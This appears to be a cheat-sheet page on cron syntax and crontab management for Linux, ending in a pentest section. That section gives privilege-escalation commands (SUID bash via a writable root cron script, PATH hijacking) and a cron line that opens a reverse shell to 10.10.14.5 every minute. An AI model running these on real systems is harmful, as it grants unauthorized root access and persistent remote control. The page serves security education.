CyberCheatsheets

Crontab Cheat Sheet

Cron syntax reference and commands for scheduling jobs on Linux — plus persistence and privesc angles for pentesters.

Utilities & ShellscroncrontablinuxpersistenceschedulingUpdated 2026-06-17

Overview

Cron runs commands on a schedule. The five-field time syntax trips everyone up, so this sheet pins it down with examples. For security work, cron is both a persistence mechanism and a privesc target—writable scripts run by root cron are a classic escalation path.

Authorized use only. Schedule jobs and test cron-based escalation only on systems you own or have permission to test.

The five fields

minute(0-59) hour(0-23) day-of-month(1-31) month(1-12) day-of-week(0-7)

* * * * *  command

Every 5 minutes

*/5 * * * *

Every hour on the hour

0 * * * *

Every day at 02:00

0 2 * * *

09:00 on weekdays (Mon-Fri)

0 9 * * 1-5

Midnight on the 1st of each month

0 0 1 * *

Shortcuts & ranges

Run once at startup (handy for persistence)

@reboot   command

Named schedules

@daily / @hourly / @weekly

Lists: at :00 and :30

0,30 * * * *

Ranges: every hour from 09:00 to 17:00

0 9-17 * * *

Steps: every 6 hours

0 */6 * * *

Managing crontabs

Edit your user's crontab

crontab -e

List your cron jobs

crontab -l

Remove all your cron jobs (careful!)

crontab -r

View another user's crontab (as root)

crontab -u www-data -l

Check the cron daemon is running

sudo systemctl status cron

Where cron jobs live

System-wide crontab (has a user field)

cat /etc/crontab

Drop-in system cron files

ls -la /etc/cron.d/

Scripts run on those schedules

ls -la /etc/cron.{hourly,daily,weekly,monthly}/

Per-user crontabs (root-only read)

ls -la /var/spool/cron/crontabs/

Pentest angle: privesc & persistence

Find cron jobs that run scripts you can write to

cat /etc/crontab; ls -la /etc/cron.*; grep -R . /etc/cron* 2>/dev/null

If a root cron runs a writable script, append a payload

echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/writable-cron-script.sh

PATH abuse: cron uses a limited PATH — plant a binary if a relative name is called

echo -e '#!/bin/bash\nchmod +s /bin/bash' > /writable-path/scriptname; chmod +x /writable-path/scriptname

Persistence: a reverse shell every minute

(crontab -l 2>/dev/null; echo '* * * * * bash -c "bash -i >& /dev/tcp/10.10.14.5/443 0>&1"') | crontab -

Tips

  • Cron runs with a minimal environment — always use absolute paths in jobs.
  • Redirect output (>> /tmp/job.log 2>&1) to debug jobs that 'silently' don't run.
  • % in a crontab command is special (newline) — escape it as \% or quote it.
  • For privesc, the prize is any root-owned cron that executes a file or PATH entry you can modify.

References

Aide-mémoires similaires